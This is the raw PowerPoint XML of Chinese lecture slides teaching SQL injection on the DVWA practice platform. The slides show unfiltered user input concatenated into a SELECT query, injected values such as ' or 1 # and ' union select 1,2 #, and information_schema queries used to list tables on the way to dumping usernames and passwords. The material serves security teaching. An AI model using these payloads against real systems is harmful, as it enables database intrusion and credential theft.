                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第9行：mysqli_query函数的功能：执行SQL语句操作。</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eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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这里</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，没有对特殊字符进行转义，也没有对用户输入做任何的过滤。</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457200" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pP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5"/>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20090" y="1325245"/>
            <a:ext cx="10800080" cy="5368290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>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cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>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分析注</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入</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值</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拼接到</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT</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语句</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中的情况：</a:t>
            </a:r>
            <a:endParaRPr altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>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altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:endParaRPr altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>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altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = '</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:endParaRPr altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>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altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> or 1 #</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:endParaRPr altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>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zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【注意】</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是</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MySQL</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的</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注释符。</a:t>
            </a:r>
            <a:endParaRPr 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5"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3971925" y="-334010"/>
            <a:ext cx="4064000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90170" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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20090" y="1325245"/>
            <a:ext cx="10800080" cy="5368290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>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zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用</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union</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联</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合</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查询</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句</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a:t>
            </a:r>
            <a:endParaRPr altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="304800" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct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altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = '</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> union select 1,2 #</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:endParaRPr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5"/>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3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2966720" y="2925445"/>
            <a:ext cx="6257925" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3971925" y="-334010"/>
            <a:ext cx="4064000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90170" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" marR="0" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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00" y="1350000"/>
            <a:ext cx="10800000" cy="5055870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5、获取DVWA平台的用户名和密码</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0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【说明</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information_schema数据库</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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101"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information_schema数据库</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是MySQL中一个特殊的系统数据库，它包含了所有其他数据库的信息。</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zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101"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information_schema.tables表：列出了所有数据库中的所有表及其所属的数据库。表中的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table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</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表名</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table_schema</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为所属的数据</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库</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marL="0" lvl="2" indent="609600" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="4158780845"/>
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="0" checksum="0"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>③</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101"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columns表：列出了所有表的所有列，包括列名、数据类型、是否允许为空等信息。表中的</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column_name</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为</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列名</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table_name</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为所属的表。</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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="400050"/>
            <a:ext cx="1080000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00" y="1350000"/>
            <a:ext cx="10800000" cy="5055870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5、获取DVWA平台的用户名和密码</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0" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【说明</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1</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information_schema数据库</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dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>④</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101"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查询</a:t>
            </a:r>
            <a:r>
              <a:rPr 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dvwa”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库中的所有表：</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720090" lvl="1"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select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table_name from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information_schema.tables</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where table_schema='dvwa';</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sz="2400" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>⑤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101"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查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
